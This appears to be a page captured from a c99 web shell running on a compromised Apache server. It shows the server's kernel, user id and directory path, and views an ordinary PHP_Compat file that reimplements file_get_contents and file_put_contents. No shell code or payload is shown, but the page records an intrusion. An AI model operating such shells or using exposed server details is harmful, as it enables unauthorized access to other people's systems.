!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/includes/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)


Viewing file:     compat.php42x.php (3.68 KB)      -rw-r--r--
<?php
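/**
 * Include guard: this file is meant to be pulled in by a parent script that
 * has already defined _VALID_ACCESS; execution stops here otherwise.
 *
 * The guard only keeps the file from running when it is requested directly.
 * It is not an access control: it does not restrict who can read the file on
 * disk, so it must not be relied on to protect anything stored alongside it.
 */
defined('_VALID_ACCESS') or die('Direct Access to this location is not allowed.');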

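/**
 * Replace file_get_contents()
 *
 * Reads a whole file into a string on PHP versions that lack the native
 * function. The definition is skipped when file_get_contents() already exists.
 *
 * Security note: $filename is handed to fopen() unchanged, so any stream
 * wrapper the PHP configuration allows (for example remote URLs when
 * allow_url_fopen is on) is honoured. Callers must validate or whitelist the
 * path themselves before passing request-derived values.
 *
 * @category    PHP
 * @package     PHP_Compat
 * @link        http://php.net/function.file_get_contents
 * @author      Aidan Lister <aidan@php.net>
 * @version     $Revision: 1.1 $
 * @internal    resource_context is not supported
 * @since       PHP 5
 * @require     PHP 4.0.1 (trigger_error)
 *
 * @param  string   $filename          Path (or wrapper URL) to read
 * @param  bool     $incpath           Also search the include_path when true
 * @param  resource $resource_context  Accepted for signature compatibility, ignored
 * @return string|false                File contents, or false if the open failed
 */
if (!function_exists('file_get_contents')) {
    function file_get_contents($filename, $incpath = false, $resource_context = null)
    {
        // Suppress fopen()'s own warning so only the E_USER_WARNING below is
        // raised, matching how the file_put_contents() replacement opens files.
        $fh = @fopen($filename, 'rb', $incpath);
        if ($fh === false) {
            trigger_error('file_get_contents() failed to open stream: No such file or directory', E_USER_WARNING);
            return false;
        }

        // Always read until EOF instead of trusting filesize($filename):
        // with $incpath the opened file may not be the one filesize() stats,
        // and the file can change size between the stat and the read.
        $data = '';
        while (!feof($fh)) {
            $chunk = fread($fh, 8192);
            if ($chunk === false || $chunk === '') {
                // Read error or nothing more to deliver: stop rather than spin
                break;
            }
            $data .= $chunk;
        }

        fclose($fh);
        return $data;
    }
}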
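// Flag constants used by the file_put_contents() replacement below. They are
// only defined when the running PHP version does not already provide them.
if (!defined('FILE_USE_INCLUDE_PATH')) {
    define('FILE_USE_INCLUDE_PATH', 1);
}

if (!defined('FILE_APPEND')) {
    define('FILE_APPEND', 8);
}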


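/**
 * Replace file_put_contents()
 *
 * Writes a string (or an array of strings, concatenated) to a file on PHP
 * versions that lack the native function. The definition is skipped when
 * file_put_contents() already exists.
 *
 * Only FILE_APPEND and FILE_USE_INCLUDE_PATH are inspected in $flags. Any
 * other bit, including a lock request, is silently ignored, so callers that
 * depend on exclusive locking get no lock from this replacement.
 *
 * Security note: $filename is handed to fopen() unchanged. Callers must
 * validate the destination themselves before passing request-derived values,
 * since this function will create or truncate whatever path it is given.
 *
 * @category    PHP
 * @package     PHP_Compat
 * @link        http://php.net/function.file_put_contents
 * @author      Aidan Lister <aidan@php.net>
 * @version     $Revision: 1.1 $
 * @internal    resource_context is not supported
 * @since       PHP 5
 * @require     PHP 4.0.1 (trigger_error)
 *
 * @param  string       $filename          Destination path
 * @param  string|array $content           Data to write; arrays are joined with ''
 * @param  int          $flags             Bitmask of FILE_APPEND / FILE_USE_INCLUDE_PATH
 * @param  resource     $resource_context  Accepted for signature compatibility, ignored
 * @return int|false                       Bytes written, or false on any failure
 */
if (!function_exists('file_put_contents')) {
    function file_put_contents($filename, $content, $flags = null, $resource_context = null)
    {
        // If $content is an array, convert it to a string
        if (is_array($content)) {
            $content = implode('', $content);
        }

        // If we don't have a string, throw an error
        if (!is_scalar($content)) {
            trigger_error('file_put_contents() The 2nd parameter should be either a string or an array', E_USER_WARNING);
            return false;
        }

        // Get the length of data to write
        $length = strlen($content);

        // Append or truncate, depending on the FILE_APPEND bit
        $mode = ($flags & FILE_APPEND) ? 'a' : 'w';

        // Check if we're using the include path
        $use_inc_path = ($flags & FILE_USE_INCLUDE_PATH) ? true : false;

        // Open the file for writing
        $fh = @fopen($filename, $mode, $use_inc_path);
        if ($fh === false) {
            trigger_error('file_put_contents() failed to open stream: Permission denied', E_USER_WARNING);
            return false;
        }

        // Write to the file
        $bytes = @fwrite($fh, $content);
        if ($bytes === false) {
            // Release the handle before bailing out so a failed write
            // does not leak an open descriptor
            @fclose($fh);
            $errormsg = sprintf('file_put_contents() Failed to write %d bytes to %s',
                            $length,
                            $filename);
            trigger_error($errormsg, E_USER_WARNING);
            return false;
        }

        // Close the handle
        @fclose($fh);

        // Check all the data was written
        if ($bytes !== $length) {
            $errormsg = sprintf('file_put_contents() Only %d of %d bytes written, possibly out of free disk space.',
                            $bytes,
                            $length);
            trigger_error($errormsg, E_USER_WARNING);
            return false;
        }

        // Return length
        return $bytes;
    }
}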

?>

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0185 ]--